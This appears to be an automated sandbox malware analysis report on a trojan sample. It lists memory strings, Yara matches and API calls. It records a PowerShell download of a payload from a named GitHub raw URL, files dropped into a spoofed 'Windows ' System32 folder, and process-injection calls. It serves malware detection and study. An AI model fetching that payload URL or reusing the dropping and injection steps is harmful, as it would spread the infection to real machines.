    Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49727 version: TLS 1.2
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: PrintUI.pdb source: printui.exe, 00000008.00000002.3325253857.00007FF763692000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000B.00000002.3427200134.00007FF763692000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000B.00000000.3327777012.00007FF763692000.00000002.00000001.01000000.00000007.sdmp, printui.exe.5.dr
    Source: Binary string: PrintUI.pdbGCTL source: printui.exe, 00000008.00000002.3325253857.00007FF763692000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000B.00000002.3427200134.00007FF763692000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000B.00000000.3327777012.00007FF763692000.00000002.00000001.01000000.00000007.sdmp, printui.exe.5.dr
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then sub rsp, 38h0_2_00007FF733B39440
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push r140_2_00007FF733AFB3D0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B37380
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then sub rsp, 28h0_2_00007FF733B37380
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B278A6
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then mov rdx, qword ptr [rdx]0_2_00007FF733B297F6
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rbx0_2_00007FF733B27766
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then mov rdx, qword ptr [rdx]0_2_00007FF733B29736
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B276B6
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then mov rdx, qword ptr [rdx]0_2_00007FF733B295E6
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push r130_2_00007FF733B3B600
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push r130_2_00007FF733B3B600
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then sub rsp, 38h0_2_00007FF733B35600
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B27606
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then xor r9d, r9d0_2_00007FF733B37610
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push r150_2_00007FF733AF7550
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push r140_2_00007FF733B0554C
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then mov rdx, qword ptr [rdx]0_2_00007FF733B29526
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B27556
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rbx0_2_00007FF733B27AB6
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B27A06
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B27956
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B05EFC
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B21E6A
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rbp0_2_00007FF733B05D2C
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B33D20
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B33D20
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B3C4C6
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rbx0_2_00007FF733B3C386
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B3C2D6
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B3C226
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B3C176
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then sub rsp, 28h0_2_00007FF733B348A0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then mov rdx, qword ptr [rdx]0_2_00007FF733B3C8D6
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then mov rdx, qword ptr [rdx]0_2_00007FF733B3C816
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push r150_2_00007FF733AC47F0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push r150_2_00007FF733AF2700
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rbx0_2_00007FF733B3C6D6
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B3C626
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B3C576
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rbx0_2_00007FF733B04C69
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then sub rsp, 28h0_2_00007FF733B42C10
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B36BC0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then sub rsp, 28h0_2_00007FF733B36BC0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push r130_2_00007FF733B3AB90
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push r130_2_00007FF733B3AB90
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then mov rdx, qword ptr [rdx]0_2_00007FF733B3CAE6
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B16AFD
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then mov rdx, qword ptr [rdx]0_2_00007FF733B3CA26
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B30940
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rbx0_2_00007FF733A9D0C4
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then mov rax, qword ptr [rcx+10h]0_2_00007FF733AB50B9
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rdi0_2_00007FF733B1908D
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rbx0_2_00007FF733B37040
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 4x nop then push rsi0_2_00007FF733B38ED0
    Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: global trafficHTTP traffic detected: GET /panchitopistolesx/items/main/usvcusb.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /panchitopistolesx/items/main/usvcusb.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
    Source: powershell.exe, 00000005.00000002.3357572970.0000022910071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3357572970.00000229101B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000005.00000002.3329958642.0000022900221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000005.00000002.3329958642.0000022900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000005.00000002.3329958642.0000022900221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: svchost.exe, 00000002.00000000.2239181782.0000020857A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427453677.0000020857A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
    Source: svchost.exe, 00000002.00000002.3427453677.0000020857A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
    Source: svchost.exe, 00000002.00000000.2239181782.0000020857A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427453677.0000020857A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.comable
    Source: svchost.exe, 00000002.00000000.2239161001.0000020857A44000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427414911.0000020857A44000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
    Source: svchost.exe, 00000002.00000000.2239161001.0000020857A44000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427414911.0000020857A44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.comt
    Source: powershell.exe, 00000005.00000002.3329958642.0000022900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: svchost.exe, 00000002.00000000.2239161001.0000020857A44000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427414911.0000020857A44000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
    Source: svchost.exe, 00000002.00000000.2239161001.0000020857A44000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427414911.0000020857A44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
    Source: svchost.exe, 00000002.00000000.2239161001.0000020857A44000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427414911.0000020857A44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
    Source: svchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.comsc6
    Source: svchost.exe, 00000002.00000000.2239181782.0000020857A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427453677.0000020857A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
    Source: powershell.exe, 00000005.00000002.3357572970.00000229101B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000005.00000002.3357572970.00000229101B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000005.00000002.3357572970.00000229101B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000005.00000002.3329958642.0000022900221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: svchost.exe, 00000002.00000000.2239181782.0000020857A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427453677.0000020857A65000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
    Source: svchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
    Source: svchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
    Source: svchost.exe, 00000002.00000000.2239205123.0000020857A8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427486616.0000020857A8F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
    Source: svchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local/
    Source: svchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
    Source: svchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
    Source: powershell.exe, 00000005.00000002.3357572970.0000022910071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3357572970.00000229101B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000005.00000002.3329958642.0000022900221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
    Source: powershell.exe, 00000005.00000002.3329958642.0000022900221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/panchitopistolesx/items/main/usvcusb.dat
    Source: svchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
    Source: svchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49727 version: TLS 1.2

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: amsi64_6656.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: Process Memory Space: powershell.exe PID: 6656, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Powershell drops PE file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\printui.exeJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\pyld.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\printui.dll (copy)Jump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733A92CC5 NtDelayExecution,0_2_00007FF733A92CC5
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733A92CAD NtQuerySystemInformation,0_2_00007FF733A92CAD
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733A92CA1 NtCreateThreadEx,0_2_00007FF733A92CA1
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733A92C95 NtWriteVirtualMemory,0_2_00007FF733A92C95
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733A92C89 NtAllocateVirtualMemory,0_2_00007FF733A92C89
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733A92C71 NtClose,0_2_00007FF733A92C71
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\WindowsJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\printui.exeJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733B402800_2_00007FF733B40280
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AE34B50_2_00007FF733AE34B5
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AD74A40_2_00007FF733AD74A4
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AA54500_2_00007FF733AA5450
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733ADB3100_2_00007FF733ADB310
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AE52400_2_00007FF733AE5240
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733A952200_2_00007FF733A95220
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AA32100_2_00007FF733AA3210
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733ADD2120_2_00007FF733ADD212
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AC72000_2_00007FF733AC7200
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AD91730_2_00007FF733AD9173
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AD58240_2_00007FF733AD5824
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AC16800_2_00007FF733AC1680
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733ABB5C00_2_00007FF733ABB5C0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AF75500_2_00007FF733AF7550
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AF55700_2_00007FF733AF5570
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733A95CB00_2_00007FF733A95CB0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733ACBCAE0_2_00007FF733ACBCAE
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733ADBCA00_2_00007FF733ADBCA0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733ACBCF80_2_00007FF733ACBCF8
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AE5C600_2_00007FF733AE5C60
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AE7B600_2_00007FF733AE7B60
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733ADFAF00_2_00007FF733ADFAF0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733ADDA100_2_00007FF733ADDA10
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733A9B9200_2_00007FF733A9B920
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AD9FC00_2_00007FF733AD9FC0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AA20000_2_00007FF733AA2000
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AAE4800_2_00007FF733AAE480
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AFA3B00_2_00007FF733AFA3B0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AE43960_2_00007FF733AE4396
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AD82F60_2_00007FF733AD82F6
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AC82200_2_00007FF733AC8220
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AC61900_2_00007FF733AC6190
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AC47F00_2_00007FF733AC47F0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733A9E7500_2_00007FF733A9E750
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733ABA6D00_2_00007FF733ABA6D0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AC26A00_2_00007FF733AC26A0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AE66A00_2_00007FF733AE66A0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AF27000_2_00007FF733AF2700
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733ADC6800_2_00007FF733ADC680
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AD66740_2_00007FF733AD6674
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AE86000_2_00007FF733AE8600
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733A9EC500_2_00007FF733A9EC50
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733ABAC600_2_00007FF733ABAC60
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733B30BE00_2_00007FF733B30BE0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AB0B500_2_00007FF733AB0B50
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AAAB600_2_00007FF733AAAB60
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AD4A100_2_00007FF733AD4A10
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733ADA9500_2_00007FF733ADA950
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AE091D0_2_00007FF733AE091D
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AA49800_2_00007FF733AA4980
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AE70C00_2_00007FF733AE70C0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AE90400_2_00007FF733AE9040
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733ACCF180_2_00007FF733ACCF18
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733ACCECE0_2_00007FF733ACCECE
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AACF100_2_00007FF733AACF10
    Source: C:\Windows \System32\printui.exeCode function: 8_2_00007FF7636910E08_2_00007FF7636910E0
    Source: C:\Windows \System32\printui.exeCode function: 11_2_00007FF7636910E011_2_00007FF7636910E0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: String function: 00007FF733B4B0C0 appears 99 times
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: String function: 00007FF733B31C70 appears 144 times
